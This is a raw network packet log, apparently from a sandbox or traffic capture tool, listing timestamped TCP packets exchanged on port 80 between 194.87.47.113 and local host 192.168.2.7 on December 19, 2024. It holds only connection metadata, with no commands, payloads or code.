Dec 19, 2024 08:47:26.930763960 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.930854082 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.930937052 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.931631088 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.931687117 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.931772947 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.932374001 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.932548046 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.932602882 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.933111906 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.933186054 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.933336973 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.933891058 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.933957100 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.934093952 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.934675932 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.934745073 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.935035944 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.935501099 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.935597897 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.935798883 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.936286926 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.936424971 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.936625004 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.937231064 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.937247992 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.937360048 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.937822104 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.938090086 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.938188076 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.938788891 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.938896894 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.939071894 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.939420938 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.939559937 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.939672947 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.940274000 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.940390110 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.940411091 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.941081047 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.941231012 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.941268921 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.941834927 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.942044020 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.942121983 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.942658901 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.942853928 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.942929983 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.943370104 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.943425894 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.943639994 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.944242001 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.944385052 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.944389105 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.944971085 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.945039034 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.945168972 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.945780039 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.945884943 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.945941925 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.946558952 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.946638107 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.946724892 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.947349072 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.947689056 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.947748899 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.948230028 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.948355913 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.948381901 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.948941946 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.949029922 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.949196100 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.949768066 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.949897051 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.949981928 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.950481892 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.950690031 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.950830936 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.951296091 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.951493979 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.951561928 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.952187061 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.952256918 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.952337027 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.952979088 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.953094006 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.953176022 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.953677893 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.953882933 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.953977108 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.954499006 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.954552889 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.954668045 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.955262899 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.955454111 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.955477953 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.956073999 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.956240892 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.956317902 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.956974030 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.957250118 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.957313061 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.957621098 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.957926035 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.958009005 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.958424091 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.958501101 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.958688974 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.959377050 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.959414959 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.959448099 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.960057974 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.960233927 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.960253000 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.960971117 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.960990906 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.961220980 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:26.961632013 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.961803913 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:26.962282896 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.097829103 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.098027945 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.098292112 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.098398924 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.098778009 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.098932981 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.099096060 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.099479914 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.099554062 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.099822998 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.115262032 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.115329027 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.115438938 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.115796089 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.115859985 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.116162062 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.116334915 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.116394997 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.116710901 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.117156982 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.117202997 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.117412090 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.117888927 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.117970943 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.118071079 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.118664980 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.118762970 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.118901968 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.119452000 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.119501114 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.119651079 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.120301962 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.120434999 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.120438099 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.121073961 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.121124029 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.121244907 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.121800900 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.121903896 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.122136116 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.122653008 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.122726917 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.122811079 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.123472929 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.123564005 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.123624086 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.124311924 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.124409914 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.124517918 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.125161886 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.125235081 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.125262022 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.125842094 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.125900984 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.126202106 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.126576900 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.126629114 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.126781940 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.127368927 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.127434015 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.127612114 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.128194094 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.128240108 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.128324032 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.128931046 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.129007101 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.129098892 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.129748106 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.129828930 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.129924059 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.130579948 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.130664110 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.130718946 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.131366014 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.131436110 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.131477118 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.132110119 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.132237911 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.132283926 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.132993937 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.133148909 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.133177996 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.133698940 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.133761883 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.133857965 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.134519100 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.134569883 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.134651899 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.135322094 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.135394096 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.135435104 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.136053085 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.136096001 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.136251926 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.137059927 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.137073040 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.137243032 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.137702942 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.137773037 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.137856960 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.138501883 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.138545990 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.138679028 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.139357090 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.139517069 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.139533997 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.140121937 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.140188932 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.140212059 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.140820026 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.140953064 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.141014099 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.141624928 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.141700983 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.141849995 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.142417908 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.142661095 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.142692089 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.143184900 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.143281937 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.143352985 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.143995047 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.144073009 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.144207001 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.144778013 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.144854069 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.144927979 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.145576954 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.145653009 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.145745039 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.146383047 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.146497011 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.146614075 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.147144079 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.147202015 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.147356033 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.147977114 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.148036003 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.148178101 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.148756027 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.148817062 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.148916960 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.149575949 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.149797916 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.149818897 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.150340080 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.150381088 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.150504112 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.151134014 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.151222944 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.151321888 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.151910067 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.151969910 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.152057886 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.152790070 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.152935028 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.152962923 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.153475046 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.153543949 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.153681993 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.200257063 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.290153980 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.290169954 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.290230989 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.290247917 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.290591955 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.290730000 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.290992975 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.291248083 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.291321993 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.291738987 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.291901112 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.291980982 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.307769060 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.307861090 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.307919979 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.308223009 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.308608055 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.308679104 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.310195923 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.310211897 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.310262918 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.310827017 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.310841084 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.310962915 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.311521053 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.311537027 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.311609030 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.312206984 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.312218904 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.312282085 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.313081026 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.313095093 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.313152075 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.313590050 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.313604116 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.313663960 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.314320087 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.314337015 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.314388037 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.314996958 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.315011024 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.315047979 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.315644979 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.315983057 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.316080093 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.316371918 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.316384077 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.316428900 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.317032099 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.317392111 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.317445040 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.317864895 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.318097115 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.318197966 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.318465948 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.318783045 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.318849087 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.319148064 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.319505930 CET	80	49707	194.87.47.113	192.168.2.7
